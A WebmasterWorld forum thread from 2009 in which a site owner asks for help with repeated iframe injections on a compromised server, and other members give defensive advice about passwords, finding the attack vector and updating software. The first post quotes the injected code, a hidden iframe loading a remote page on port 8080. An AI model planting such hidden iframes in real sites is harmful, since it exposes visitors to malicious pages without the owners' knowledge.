Iframe Injections - Apache Web Server forum at WebmasterWorld - WebmasterWorld

Forum Moderators: phranque

Message Too Old, No Replies

Iframe Injections

My site keeps getting hijacked by a killer iframe script.

acimag

2:04 pm on Jun 4, 2009 (gmt 0)

10+ Year Member

I am currently hosted on the planet on a dedicated server.

We have put Mod_Security into effect and blocked all known bad bots from the server.

However we have been getting attacked by Iframes negativly effecting our search engine positions.

I have installed Serpguard and it has not warned me at all even when it was on the malicious list on google.

<iframe src="http://example.com:8080/index.php" width=197 height=107 style="visibility: hidden"></iframe>

was injected right after the <body> tag.

We use the full version of the Sitemap Generator but we don't even have the generator installed on the account that got hijacked.

also on the server logs the day of the attacks we see 1 second logins with really long string random names and the server shows ?@ cause even the server doesn't know who it is.

==================
Anyone have any ideas

Any products to scan for open holes on our server.

Any other Advice? Cause serpguard only helps after the fact.

[edited by: jdMorgan at 3:42 pm (utc) on June 4, 2009]
[edit reason] example.com [/edit]

mattur

2:21 pm on Jun 4, 2009 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Change passwords. Check security of all applications running on your server. Identify the attack vector the hackers are using to compromise your server and close it.

See this recent thread on iframe injections [webmasterworld.com]

acimag

2:41 pm on Jun 4, 2009 (gmt 0)

10+ Year Member

Let's say im not good at all with shell or putty.

Is there another way to scan and find it.

mattur

4:12 pm on Jun 4, 2009 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

This is not a "run automated tool to fix" scenario.

Your problem isn't that something is injecting iframes, your problem is that someone has compromised your server. Who knows what else they've done while they've been in there?

You need to find out how they got in, close it and fix any damage they've done while they've been in there.

Contact your hosting company for assistance if you're unsure how to proceed. Switch to a fully-managed server if you don't have the time to manage it yourself. You must secure and monitor your server (and the applications on it) on an ongoing basis. Otherwise it will just happen again. And again. And again...

acimag

4:54 pm on Jun 5, 2009 (gmt 0)

10+ Year Member

We did contact the host they are really no help. Anyone know anyone at The Planet... Cause I'd like to speak to someone who has a clue.

jdMorgan

1:23 pm on Jun 6, 2009 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

If you are not on a "managed dedicated server account," then you are responsible for securing and maintaining your server. This means you'll need expertise in server security, or you'll need to develop or hire that expertise. If you are getting "We can't help you" from your host, they may mean "We can't help you because you haven't signed up for a managed account, and the cost to us to fix your server would exceed your monthly (or semi-annual) hosting fee."

The previously-posted recommendations are sound. I'll add that part of "check security of all applications" is to make sure that all software installed on the server is the latest version, since only the latest version will have closed all known security holes. If you've got old versions of PHP or forum, blog, CMS, or database scripts on your server, then you're a sitting duck for malicious scanners to find and target for exploits.

Jim